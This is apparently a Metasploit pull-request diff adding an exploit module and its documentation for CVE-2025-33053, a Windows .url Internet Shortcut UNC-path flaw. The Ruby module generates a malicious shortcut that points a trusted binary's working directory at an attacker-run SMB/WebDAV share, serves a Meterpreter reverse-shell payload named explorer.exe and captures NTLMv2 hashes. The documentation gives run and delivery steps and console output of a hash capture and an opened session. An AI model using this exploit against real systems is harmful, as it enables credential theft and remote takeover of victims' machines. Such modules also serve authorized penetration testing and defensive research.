Land #20324, adds exploit for UNC path in .url files (CVE-2025-33053)

Adds exploit module for Internet Shortcut UNC path vulnerability (CVE-2025-33053)

Author: msutovsky-r7

documentation/modules/exploit/windows/fileformat/unc_url_cve_2025_33053.md

@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+CVE-2025-33053 - Internet Shortcut (.url) UNC Path Exploit
+
+Windows improperly handles `.url` (Internet Shortcut) files referencing remote
+UNC paths. Specifically, `.url` files that specify a remote working directory
+(`WorkingDirectory=\\attacker\webdav`) and a trusted executable (e.g.,
+`iediagcmd.exe`) may cause the system to access the attacker's server when opened.
+
+This behavior can be exploited to:
+
+- Trigger NTLM authentication leaks (SMB relay)
+- Load remote payloads via WebDAV shares
+- Attempt DLL sideloading if conditions allow
+
+## Affected Versions
+
+- Windows 10 22H2
+- Windows 11 23H2
+- Fully patched prior to June 2025 Patch Tuesday
+
+## Verification Steps
+
+1. Run: `use windows/fileformat/unc_url_cve_2025_33053`
+2. Run: `set LHOST [IP address]`
+3. Run: `set SRVHOST [IP address]`
+4. Run: `run`
+5. Deliver the `.url` to the target (email, USB, zip)
+6. On victim's machine, open `.url`
+7. Payload execution
+
+### Overview
+
+This module generates a malicious `.url` Internet Shortcut file that abuses
+CVE-2025-33053 — a vulnerability in how Windows handles `.url` files referencing remote UNC
+paths.
+
+When opened on a vulnerable system, the `.url` causes the system to connect to a
+UNC path(e.g., a WebDAV or SMB share), triggering an attempt to execute a trusted binary
+from the attacker's location. This can result in RCE or credential leaks.
+
+
+## Options
+
+### OUTFILE
+This option allows user to define their own .url file. If this option is not set, the module will generate random .url file - `YWSXVjpW.url`.
+
+### FOLDER_NAME
+The `FOLDER_NAME` option defines SMB share folder, where the final payload file is stored. Generally can be anything, default is `webdav`.
+
+### FILE_NAME
+This option defines payload file stored in SMB share. This option should not change as it is bound to executable in `URL` parameter of `.url` file. The default value is `explorer.exe`.
+
+
+## Scenarios
+
+```
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > run verbose=true 
+[*] Exploit running as background job 2.
+[*] Exploit completed, but no session was created.
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > [*] Started reverse TCP handler on 192.168.3.7:4444 
+[*] URL file: /home/ms/.msf4/local/YWSXVjpW.url, deliver to target's machine and wait for shell
+[*] Run following: curl http://192.168.3.7:8080/YWSXVjpW.url -o YWSXVjpW.url
+[*] Server is running. Listening on 192.168.3.7:4445
+[*] The SMB service has been started.
+[*] Received SMB connection from 10.5.132.137
+[SMB] NTLMv2-SSP Client     : 10.5.132.137
+[SMB] NTLMv2-SSP Username   : WIN10_22H2_7FD2\msfuser
+[SMB] NTLMv2-SSP Hash       : msfuser::WIN10_22H2_7FD2:[HASH]
+
+[*] Sending stage (203846 bytes) to 10.5.132.137
+[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.137:49740) at 2025-06-24 16:08:56 +0200
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > sessions 
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                Connection
+  --  ----  ----                     -----------                                ----------
+  1         meterpreter x64/windows  WIN10_22H2_7FD2\msfuser @ WIN10_22H2_7FD2  192.168.3.7:4444 -> 10.5.132.137:49740 (10.5.132.137)
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WIN10_22H2_7FD2
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
+
+
+## References
+
+- [GitHub PoC](https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept)
+- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-33053)
+- [LOLBAS Project](https://lolbas-project.github.io)
+- [Microsoft Advisory](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053)
+

modules/exploits/windows/fileformat/unc_url_cve_2025_33053.rb

@@ -0,0 +1,102 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::Remote::SMB::Server::HashCapture
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'CVE-2025-33053 Exploit via Malicious .URL File and WebDAV',
+        'Description' => %q{
+          This module exploits CVE-2025-33053 by generating a malicious .URL file pointing
+          to a trusted LOLBAS binary with parameters designed to trigger unintended behavior.
+          Optionally, a payload is generated and hosted on a specified WebDAV directory.
+          When the victim opens the shortcut, it will attempt to access the WebDAV path,
+          potentially resulting in remote code execution via a trusted binary.
+        },
+
+        'Author' => [
+          'Alexandra Gofman', # vuln research
+          'David Driker', # vuln research
+          'Dev Bui Hieu' # module dev
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2025-06-11',
+        'References' => [
+          ['CVE', '2025-33053'],
+          ['URL', 'https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept']
+        ],
+        'Platform' => 'win',
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Passive' => true,
+        'Targets' => [['Windows (generic)', {}]],
+        'DefaultOptions' => {
+          'FOLDER_NAME' => 'webdav',
+          'FILE_NAME' => 'explorer.exe',
+          'DisablePayloadHandler' => false,
+          'Payload' => 'windows/x64/meterpreter/reverse_tcp'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('OUTFILE', [false, 'Output URL file name', '']),
+      ], self.class
+    )
+  end
+
+  def exploit_remote_load
+    start_service
+    print_status('The SMB service has been started.')
+
+    self.file_contents = generate_payload_exe
+  end
+
+  def exploit
+    write_url_file
+    exploit_remote_load
+
+    stime = Time.now.to_f
+    timeout = datastore['ListenerTimeout'].to_i
+    loop do
+      break if timeout > 0 && (stime + timeout < Time.now.to_f)
+
+      Rex::ThreadSafe.sleep(1)
+    end
+  end
+
+  def write_url_file
+    content = generate_url_content
+    outfile = datastore['OUTFILE'].blank? ? %(#{Rex::Text.rand_text_alphanumeric(8)}.url) : datastore['OUTFILE']
+    path = store_local('webdav.url', nil, content, outfile)
+    print_status("URL file: #{path}, deliver to target's machine and wait for shell.")
+  end
+
+  def generate_url_content
+    <<~URLFILE
+      [InternetShortcut]
+      URL=C:\\Windows\\System32\\CustomShellHost.exe
+      WorkingDirectory=\\\\#{srvhost}\\#{share}\\#{folder_name}\\
+      ShowCommand=7
+      IconIndex=13
+      IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
+      Modified=20F06BA06D07BD014D
+    URLFILE
+  end
+end